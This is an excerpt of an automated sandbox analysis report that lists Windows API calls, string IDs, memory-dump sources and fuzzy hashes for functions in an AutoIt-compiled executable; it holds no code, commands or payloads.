                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                                                • String ID: FILE
                                                                                                                • API String ID: 4029003684-3121273764
                                                                                                                • Opcode ID: 590a343d351aa4611667b91606d13a0c3bf0a96be3242ea3b414e4b45e59dad6
                                                                                                                • Instruction ID: f65d0d0c432a435c03d22267ba06452a05d16e4c441d119a95b00630f372ac07
                                                                                                                • Opcode Fuzzy Hash: 590a343d351aa4611667b91606d13a0c3bf0a96be3242ea3b414e4b45e59dad6
                                                                                                                • Instruction Fuzzy Hash: 81419332A14219BBDF11EBA4CC81FEF7BBAEF59714F00446AF601A7191D7719A848B70
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00DAA668
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DAA67D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: '
                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                • Opcode ID: 135e03c7738ecd16f850094112cbe6cec772cc1f860b2d9a9df719ce639282d8
                                                                                                                • Instruction ID: 99bfa768009b077a9411081cc0e18994c4bf8bb664e2486f7a78ece89e270346
                                                                                                                • Opcode Fuzzy Hash: 135e03c7738ecd16f850094112cbe6cec772cc1f860b2d9a9df719ce639282d8
                                                                                                                • Instruction Fuzzy Hash: D041F575E0020A9FDB14CFA9C881BDA7BB5FB09300F18456AE905AB381D771A945CFA1
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00D957E7
                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00D9581D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CrackInternet_memset
                                                                                                                • String ID: |
                                                                                                                • API String ID: 1413715105-2343686810
                                                                                                                • Opcode ID: b96252704a24e7cd9794acc447842d65a333ae28730529aa1916bda3eef5f499
                                                                                                                • Instruction ID: f6e49b08f093d32e2c748863fb97d23af13f9a0baff72160616f502b483e7ac6
                                                                                                                • Opcode Fuzzy Hash: b96252704a24e7cd9794acc447842d65a333ae28730529aa1916bda3eef5f499
                                                                                                                • Instruction Fuzzy Hash: 7E313B71810219EBCF11AFA0DC95EEE7FB9FF18340F104129F815A6166EB319A46DB70
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00DA961B
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DA9657
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DestroyMove
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                • Opcode ID: 145ac98f8a184d63c2f36b7177453a7721c75c74dc7f063ad5e46bb1b2448041
                                                                                                                • Instruction ID: afd29bf5edfa224c19fda2844538b8ae7cda3ea95e2fd9e7884792ab9fde865b
                                                                                                                • Opcode Fuzzy Hash: 145ac98f8a184d63c2f36b7177453a7721c75c74dc7f063ad5e46bb1b2448041
                                                                                                                • Instruction Fuzzy Hash: 74319A31500204AEEB109F68DC91FBBB7A9FF4A764F048619F8A9C7190CA31AD85CB70
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00D85BE4
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D85C1F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: 72862568ae60151b9ef651d6fe7ea603be110145e3cc4ff37576bbf259892983
                                                                                                                • Instruction ID: 5a86b894cdcfbe4e3a41e79f8fa463634c00a3e9d8897c7d75db9771fc483e19
                                                                                                                • Opcode Fuzzy Hash: 72862568ae60151b9ef651d6fe7ea603be110145e3cc4ff37576bbf259892983
                                                                                                                • Instruction Fuzzy Hash: B331B671600709ABDB24EF99E885BAEBBF5FF05350F1C4019E981D61A8E7B09A44CF31
                                                                                                                APIs
                                                                                                                • __snwprintf.LIBCMT ref: 00D96BDD
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snwprintf_memmove
                                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                • API String ID: 3506404897-2584243854
                                                                                                                • Opcode ID: b8522b7f7cc1e86f2921f24da106cd7c811b2c472303561254e3a84560382838
                                                                                                                • Instruction ID: d1f1ad4db9516e0b295db8f74e428068f86e8d5c21efc63fdda41e3335c2fff8
                                                                                                                • Opcode Fuzzy Hash: b8522b7f7cc1e86f2921f24da106cd7c811b2c472303561254e3a84560382838
                                                                                                                • Instruction Fuzzy Hash: FE213C31600218BFCF10EFA8C882EAE7BA5EF44700F554455F545A7281EA74EA45CBB1
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DA9269
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DA9274
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Combobox
                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                • Opcode ID: 089dfb52dfab864d0c26168bc7bf81908429252d3cefc1c758291aac86423b68
                                                                                                                • Instruction ID: ed66f1ca6472133e5c217f829ffbece4a3154b806159a2bee016a42e2fc88267
                                                                                                                • Opcode Fuzzy Hash: 089dfb52dfab864d0c26168bc7bf81908429252d3cefc1c758291aac86423b68
                                                                                                                • Instruction Fuzzy Hash: 5511B271300209BFEF218E54DC90FBBB76AEB8A3A4F548125F9189B290D631DC518BB4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D5C657
                                                                                                                  • Part of subcall function 00D5C619: GetStockObject.GDI32(00000011), ref: 00D5C66B
                                                                                                                  • Part of subcall function 00D5C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5C675
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00DA9775
                                                                                                                • GetSysColor.USER32(00000012), ref: 00DA978F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                • String ID: static
                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                • Opcode ID: a87096dba631342059469e0af9f15a2a6e155ccebafcf8e9393ec52cae0d556d
                                                                                                                • Instruction ID: 295daa1fe5bb6a03ac3b176f7730d3074b58648b79c803e8f5e82afa44b5e3f7
                                                                                                                • Opcode Fuzzy Hash: a87096dba631342059469e0af9f15a2a6e155ccebafcf8e9393ec52cae0d556d
                                                                                                                • Instruction Fuzzy Hash: 5211567252020AAFDB05DFB8CC45EEABBA8EB09304F054929F956E3240E635E851DB60
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00DA94A6
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DA94B5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                • Opcode ID: d392792fe5ec6dc1e6055f9353d468af4ff4ca0c6717405a55c9182fd6867439
                                                                                                                • Instruction ID: 01884c3d276d31176b858443fc14387f5cd4f3ec4a7d94d8221d971a6b702524
                                                                                                                • Opcode Fuzzy Hash: d392792fe5ec6dc1e6055f9353d468af4ff4ca0c6717405a55c9182fd6867439
                                                                                                                • Instruction Fuzzy Hash: 7E118C71100209AFEF108EA4DC90EEB7B6AEB0A378F108724F965971E0C7B5DC569B74
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00D85CF3
                                                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00D85D12
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: e870286ad4b36e9b5352f5b3416a3990f3ead39bc68acff270af7cdadfadb4cd
                                                                                                                • Instruction ID: ce86d954617574c42850d0c78245fe7679359bc11b44b9ebf08b85cbfe3e91e9
                                                                                                                • Opcode Fuzzy Hash: e870286ad4b36e9b5352f5b3416a3990f3ead39bc68acff270af7cdadfadb4cd
                                                                                                                • Instruction Fuzzy Hash: 0E119076901618ABDB20EB58EC48B9977FDAB06344F1C0025ED41EB195D370EE44CBB1
                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D9544C
                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00D95475
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$OpenOption
                                                                                                                • String ID: <local>
                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                • Opcode ID: b95ad11ceb99ffbd5ca2d85c9b27827b847d599f0a1ae526a9e168b5e897a85b
                                                                                                                • Instruction ID: 8be0500c8550ec1388ae07c9ec9590637908de67526c241f77785fed6a4cf56b
                                                                                                                • Opcode Fuzzy Hash: b95ad11ceb99ffbd5ca2d85c9b27827b847d599f0a1ae526a9e168b5e897a85b
                                                                                                                • Instruction Fuzzy Hash: 60119E70141A22BADF668F51AC84EFAFAA8EF12752F10823AF54596044E270A990C7B1
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D74557
                                                                                                                • ___raise_securityfailure.LIBCMT ref: 00D7463E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                • String ID: (
                                                                                                                • API String ID: 3761405300-2982846942
                                                                                                                • Opcode ID: 134ab70f422990eccf98c17df2e03838c1107f6c204ffa60d3f33347792703da
                                                                                                                • Instruction ID: 24eda2c7820686196940c37dfb6d67bf330a3527407969f89e4ac400b7c625b2
                                                                                                                • Opcode Fuzzy Hash: 134ab70f422990eccf98c17df2e03838c1107f6c204ffa60d3f33347792703da
                                                                                                                • Instruction Fuzzy Hash: 7C2100B55102049FDB00DF5AE9957503BA0BB58314F20982AE508FA3A0E7F2A9CACB65
                                                                                                                APIs
                                                                                                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00D9ACF5
                                                                                                                • htons.WSOCK32(00000000,?,00000000), ref: 00D9AD32
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: htonsinet_addr
                                                                                                                • String ID: 255.255.255.255
                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                • Opcode ID: 1e49c08c2b40a591f183778a3a4cfeaee1f6dea3f5bc6bc671a06fb58324e590
                                                                                                                • Instruction ID: ba2df2d3a0a7634837fef17eda902bf3b5899b179cd60e2eff5d24a01297c471
                                                                                                                • Opcode Fuzzy Hash: 1e49c08c2b40a591f183778a3a4cfeaee1f6dea3f5bc6bc671a06fb58324e590
                                                                                                                • Instruction Fuzzy Hash: A901D236200306ABCF10AFA8CC86FADB365EF44720F10852AF9169B3D1E671E804C7B5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D7C5E5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                • Opcode ID: 30429c5c0e2e86c909629ab28114c130709db6ff70ab4803a5ef4b5c197148bd
                                                                                                                • Instruction ID: d91bc7ee82f79d46b4316e43a32c3e01fca2d011fda451196d9b287349684063
                                                                                                                • Opcode Fuzzy Hash: 30429c5c0e2e86c909629ab28114c130709db6ff70ab4803a5ef4b5c197148bd
                                                                                                                • Instruction Fuzzy Hash: 9F01D471651258AFCB08EBA4CC92CFE736AEF46310B144A19F467E72D1EB35A90C9770
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock_memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 1988441806-3962188686
                                                                                                                • Opcode ID: 21080015654947e04fb2a77b902a6cfccfae62b116ec14ec1e3a1a9b9d8c2af7
                                                                                                                • Instruction ID: d1297ce3cb3d08781a0116f97108d80efc6dfef941259f388fd358d94f25af9a
                                                                                                                • Opcode Fuzzy Hash: 21080015654947e04fb2a77b902a6cfccfae62b116ec14ec1e3a1a9b9d8c2af7
                                                                                                                • Instruction Fuzzy Hash: 8301F172900218AEDB28DBA8C856EBEBBF8DB05311F00419AE593D6181E4B4E7088B70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D7C4E1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                • Opcode ID: 7232c600418a55bfafc95550932373886bb43d5b8f87e2bd608987e2a2b74e2e
                                                                                                                • Instruction ID: a0c945db076423b0c28042c51f3772901d6533d00a809d79c07967944f7daaf2
                                                                                                                • Opcode Fuzzy Hash: 7232c600418a55bfafc95550932373886bb43d5b8f87e2bd608987e2a2b74e2e
                                                                                                                • Instruction Fuzzy Hash: C701A271651108AFCB04EBA4C9A3EFF73A9DF05305F144029B547E32C2EA54AE0D96B1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D7C562
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                • Opcode ID: 5bcb08a9c93f7dd9f56387b96ee605b54d11aec8169d3caf9e24f266fcbfdefa
                                                                                                                • Instruction ID: 0440d2ace739d67071f18031daac1d3687d5fcc9c905225f9c620ddb981e4610
                                                                                                                • Opcode Fuzzy Hash: 5bcb08a9c93f7dd9f56387b96ee605b54d11aec8169d3caf9e24f266fcbfdefa
                                                                                                                • Instruction Fuzzy Hash: 1201D171A51108AFCB04EBA4C953EFF73ADDB05701F149029B507F32C2EA65AE0D92B1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
